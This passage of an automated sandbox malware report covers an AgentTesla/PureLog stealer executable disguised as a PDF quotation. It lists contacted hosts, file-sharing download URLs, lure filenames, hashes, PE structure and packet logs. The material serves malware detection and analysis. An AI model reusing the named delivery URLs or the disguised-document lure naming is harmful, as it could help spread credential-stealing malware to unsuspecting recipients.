                          https://stackoverflow.com/q/2152978/23354QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://ip-api.comaspnet_compiler.exe, 00000006.00000002.2683739560.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002E8E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://filetransfer.iodQUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.0000000003088000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://github.com/mgravell/protobuf-netQUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://filetransfer.ioQUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.0000000003001000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.0000000003088000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.0000000003001000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://s21.filetransfer.ioQUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.000000000306F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          208.95.112.1
                          		ip-api.comUnited States
                          		53334TUT-ASUStrue
                          188.114.96.3
                          		s21.filetransfer.ioEuropean Union
                          		13335CLOUDFLARENETUSfalse

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1467095
                          Start date and time:2024-07-03 18:07:09 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 7m 17s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:8
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                          renamed because original name is a hash value
                          Original Sample Name:QUOTATION_JULQTRA071244PDF.scr.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@3/1@3/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 97%
                          • Number of executed functions: 240
                          • Number of non-executed functions: 18
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: QUOTATION_JULQTRA071244#U00faPDF.scr.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          12:08:07API Interceptor33515x Sleep call for process: QUOTATION_JULQTRA071244#U00faPDF.scr.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          208.95.112.1Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          6bdudXAsQW.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          H50bdqfVH2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • ip-api.com/line/?fields=hosting
                          kZa81nzREg.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          bv8iPF7cTY.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          jsLnybSs43.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          tgBNtoWqIp.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • ip-api.com/line/?fields=hosting
                          fiDe44VTwh.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          9691e6dc404680cc6648726c8d124a6d4fc637bb6b4a092661308012438623b2_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • ip-api.com/line/?fields=hosting
                          BomqT2a55e.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          188.114.96.3Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeGet hashmaliciousFormBookBrowse
                          • www.ad14.fun/oc7s/
                          spec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
                          • www.ad14.fun/oc7s/
                          9098393827383039.exeGet hashmaliciousFormBookBrowse
                          • www.coinwab.com/kqqj/
                          SOA 020724.exeGet hashmaliciousFormBookBrowse
                          • www.ad14.fun/az6h/?Vn=Ydx4qJJ0n&3jJlx=2tWzkzncG4ra8DBegJJBToW7oB13AdJXZ1KkbDLW+Ah9MGsNEQDOdLre6u2t4zOJ63yLnsPJ97sPnqMxsSzbOxuABFq0Im2Ecm9EQ8GOdhogxDCvRrrALITlDFg7ZHNgcXHQPxMcHnGf
                          Adjunto confirmacion de pedido.exeGet hashmaliciousDBatLoader, FormBookBrowse
                          • www.coinwab.com/kqqj/
                          aAEsSBx24sxHhRz.exeGet hashmaliciousFormBookBrowse
                          • www.camperelektrikde.shop/dy13/?GdIHAFZ=8bNdgr3QvPw6/pDIZNt+55DvjzemDI0RO+pYD3qlulbIe6f7Sn3K06Z4F4Tg3hK83Y0/&BhU=5jl0ddZhNnYlOrV0
                          http://sp.26skins.com/steamstore/category/adventure_rpg/?snr=1_5_9__12Get hashmaliciousUnknownBrowse
                          • sp.26skins.com/favicon.ico
                          30Fqen2Bu3.exeGet hashmaliciousUnknownBrowse
                          • filetransfer.io/data-package/TbaYPT0S/download
                          30Fqen2Bu3.exeGet hashmaliciousUnknownBrowse
                          • filetransfer.io/data-package/TbaYPT0S/download
                          Vg46FzGtNo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                          • 000366cm.nyashka.top/phpflowergenerator.php

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          ip-api.comCuentas bancarias y cdigo ##Swift incorrecto.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          6bdudXAsQW.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          H50bdqfVH2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 208.95.112.1
                          kZa81nzREg.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          bv8iPF7cTY.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          jsLnybSs43.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          tgBNtoWqIp.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 208.95.112.1
                          fiDe44VTwh.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          9691e6dc404680cc6648726c8d124a6d4fc637bb6b4a092661308012438623b2_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 208.95.112.1
                          BomqT2a55e.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          s21.filetransfer.ioPurchase Order -JJ023639-PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 188.114.96.3
                          QUOTATION_MAYQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 188.114.96.3
                          QUOTATION_MAYQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 188.114.97.3
                          Purchase Order No.P7696#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 188.114.97.3
                          Purchase Order No.P7696#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 104.21.13.139
                          rPurchaseOrder7654.exeGet hashmaliciousRemcosBrowse
                          • 104.21.13.139
                          ORDER_LIST_OCTQTRFA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                          • 104.21.13.139
                          Purchase_Order_#PO-RBL-156502125498590-0333.exeGet hashmaliciousAveMariaBrowse
                          • 172.67.200.96
                          https://filetransfer.io/data-package/vy7g5krn/downloadGet hashmaliciousUnknownBrowse
                          • 188.114.97.7
                          Purchase Order 30 August 2022-02414291423394140374553.exeGet hashmaliciousFormBookBrowse
                          • 188.114.96.3
                          filetransfer.io30Fqen2Bu3.exeGet hashmaliciousUnknownBrowse
                          • 188.114.97.3
                          30Fqen2Bu3.exeGet hashmaliciousUnknownBrowse
                          • 188.114.96.3
                          QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 188.114.97.3
                          QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 188.114.97.3
                          30 - 3050324.scr.exeGet hashmaliciousRemcosBrowse
                          • 188.114.97.3
                          QUOTATION_JUNQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 188.114.97.3
                          Purchase Order -JJ023639-PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 188.114.96.3
                          QUOTATION_JUNQTRA031244#U0652PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 188.114.97.3
                          QUOTATION_JUNQTRA031244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                          • 188.114.97.3
                          QUOTATION_JUNQTRA031244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                          • 188.114.97.3

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          CLOUDFLARENETUSCMV610942X6UI.exeGet hashmaliciousFormBookBrowse
                          • 104.21.10.169
                          Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeGet hashmaliciousFormBookBrowse
                          • 188.114.96.3
                          Ship particulars.xlsGet hashmaliciousUnknownBrowse
                          • 188.114.96.3
                          spec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
                          • 188.114.96.3
                          Baylor.pdfGet hashmaliciousHTMLPhisherBrowse
                          • 172.65.208.22
                          03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeGet hashmaliciousFormBookBrowse
                          • 23.227.38.74
                          https://m.exactag.com/ai.aspx?tc=d9550673bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41tuskerdigital.com%2Fwinner%2F24968%2F%2FdHJ1bXBzdWNrc2RpY2tAbWFpbC5ydQ==Get hashmaliciousHTMLPhisherBrowse
                          • 104.17.2.184
                          AWB NO. 077-57676135055.exeGet hashmaliciousFormBookBrowse
                          • 172.67.146.224
                          http://ferjex.comGet hashmaliciousUnknownBrowse
                          • 104.17.2.184
                          RFQ 20726 - T5 7841.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 188.114.96.3
                          TUT-ASUSCuentas bancarias y cdigo ##Swift incorrecto.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          6bdudXAsQW.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          H50bdqfVH2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 208.95.112.1
                          kZa81nzREg.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          bv8iPF7cTY.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          jsLnybSs43.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          tgBNtoWqIp.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 208.95.112.1
                          fiDe44VTwh.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          9691e6dc404680cc6648726c8d124a6d4fc637bb6b4a092661308012438623b2_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 208.95.112.1
                          BomqT2a55e.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          3b5074b1b5d032e5620f69f9f700ff0ehttp://ferjex.comGet hashmaliciousUnknownBrowse
                          • 188.114.96.3
                          Service Desk - Please verify your Account!.emlGet hashmaliciousHTMLPhisherBrowse
                          • 188.114.96.3
                          q86onx3LvU.exeGet hashmaliciousPureLog StealerBrowse
                          • 188.114.96.3
                          6Ek4nfs2y1.exeGet hashmaliciousPhoenixKeylogger, PureLog StealerBrowse
                          • 188.114.96.3
                          q86onx3LvU.exeGet hashmaliciousPureLog StealerBrowse
                          • 188.114.96.3
                          tgBNtoWqIp.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 188.114.96.3
                          19808bS58f.exeGet hashmaliciousAgentTeslaBrowse
                          • 188.114.96.3
                          SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.6737.3783.exeGet hashmaliciousAgentTeslaBrowse
                          • 188.114.96.3
                          dhl_awb_shipping_doc_03072024224782020031808174CN18030724000000324(991KB).vbsGet hashmaliciousUnknownBrowse
                          • 188.114.96.3
                          http://beonlineboo.comGet hashmaliciousUnknownBrowse
                          • 188.114.96.3

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION_JULQTRA071244#U00faPDF.scr.exe.log

                          Download File
                          Process:C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1459
                          Entropy (8bit):5.357867833060924
                          Encrypted:false
                          SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeRE4Kx1qE4qpsXE4qdKm:MxHKlYHKh3owH8tHo6hAHKzeRHKx1qHW
                          MD5:A773BB5737D2A64BDB410F2E8FB75AE4
                          SHA1:376EEAB4713E33649D2173B61BB04E0783E26AE0
                          SHA-256:C1A11C048FF076862518318A5F07D95CFA07AE8B23552DA5CF627AA7A023CCF5
                          SHA-512:66E6C2A97ABC2481F330676B5AB195BB5CD6DC2A0726C4109ED95EA3561E73DD345F8C87994132E985CC19A8CDD8FC9CEE290B88415F5D9AA21591F65B6893C8
                          Malicious:true
                          Reputation:moderate, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):4.791974145158844
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          • Win32 Executable (generic) a (10002005/4) 49.78%
                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          File name:QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                          File size:968'192 bytes
                          MD5:f0a33bc19a7edfa50259138ceae8c2ef
                          SHA1:23502ba3d4862040181f3484c7a07fd514b7e4d0
                          SHA256:49c758a7ea0cb8c7320183804f885757f60c5979be2e5fb9e6fa9db40498939b
                          SHA512:2461d4b9a34a5a6987b32e89eda77fb59d7f5fc3acf530cb6b4d43550ab0584aca869be99e0f238a45350c608b4d887f0f338fb24641b1d6dcf298dcc99350f4
                          SSDEEP:12288:DrBd2FoHyMnIeQGZ9thag5VdTei0l0VlYDGBn0TK34TDO3AXd:iFeyMXzTeigsa4O
                          TLSH:D725940A76E6B2A1D558D736D6E71800C362DEC7B29FD28E258A33A955727BF4F03043
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'..f................................. ........@.. ....................... ............`................................

                          File Icon

                          Icon Hash:0e3333b0bbb3b035

                          Static PE Info

                          General

                          Entrypoint:0x49c42e
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x6683C227 [Tue Jul 2 09:02:31 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                          Entrypoint Preview

                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x9c3e00x4b.text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x9e0000x51a74.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xf00000xc.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x20000x9a4340x9a6004c24049b539673ae99932000d4a9633aFalse0.3992203314777328data5.659985517161451IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc0x9e0000x51a740x51c00785506ae94b612c050628b732e67a769False0.07133385894495413data2.3516735382701657IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0xf00000xc0x2007367d71016122531e9851e5b512c9cc7False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_ICON0x9e3700x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.7601351351351351
                          RT_ICON0x9e4980x368Device independent bitmap graphic, 16 x 32 x 24, image size 8320.7155963302752294
                          RT_ICON0x9e8000x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.6826241134751773
                          RT_ICON0x9ec680x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 6400.5389784946236559
                          RT_ICON0x9ef500xca8Device independent bitmap graphic, 32 x 64 x 24, image size 32000.470679012345679
                          RT_ICON0x9fbf80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.4378517823639775
                          RT_ICON0xa0ca00x668Device independent bitmap graphic, 48 x 96 x 4, image size 15360.36402439024390243
                          RT_ICON0xa13080x1ca8Device independent bitmap graphic, 48 x 96 x 24, image size 72960.33110687022900764
                          RT_ICON0xa2fb00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.30881742738589213
                          RT_ICON0xa55580xa68Device independent bitmap graphic, 64 x 128 x 4, image size 25600.2924174174174174
                          RT_ICON0xa5fc00x3228Device independent bitmap graphic, 64 x 128 x 24, image size 128000.26580996884735203
                          RT_ICON0xa91e80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 00.24244213509683515
                          RT_ICON0xad4100x42028Device independent bitmap graphic, 256 x 512 x 32, image size 00.014139568600763382
                          RT_GROUP_ICON0xef4380xbcdata0.5797872340425532
                          RT_VERSION0xef4f40x3cadata0.4175257731958763
                          RT_MANIFEST0xef8c00x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators0.5642201834862385

                          Imports

                          DLLImport
                          mscoree.dll_CorExeMain

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jul 3, 2024 18:08:08.432230949 CEST4970580192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:08.437297106 CEST8049705188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:08.437443972 CEST4970580192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:08.438275099 CEST4970580192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:08.443715096 CEST8049705188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:09.095911026 CEST8049705188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:09.099670887 CEST49706443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:09.099711895 CEST44349706188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:09.099792004 CEST49706443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:09.113295078 CEST49706443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:09.113317966 CEST44349706188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:09.147216082 CEST4970580192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:09.587304115 CEST44349706188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:09.587404966 CEST49706443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:09.852052927 CEST49706443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:09.852073908 CEST44349706188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:09.852426052 CEST44349706188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:09.897073984 CEST49706443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:09.901916027 CEST49706443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:09.944499969 CEST44349706188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:10.658854961 CEST44349706188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:10.658953905 CEST44349706188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:10.659043074 CEST49706443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:10.675766945 CEST49706443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:10.690742970 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:10.690788031 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:10.690963030 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:10.691243887 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:10.691260099 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:11.171822071 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:11.171912909 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:11.174042940 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:11.174062014 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:11.174308062 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:11.175704956 CEST49707443192.168.2.8188.114.96.3
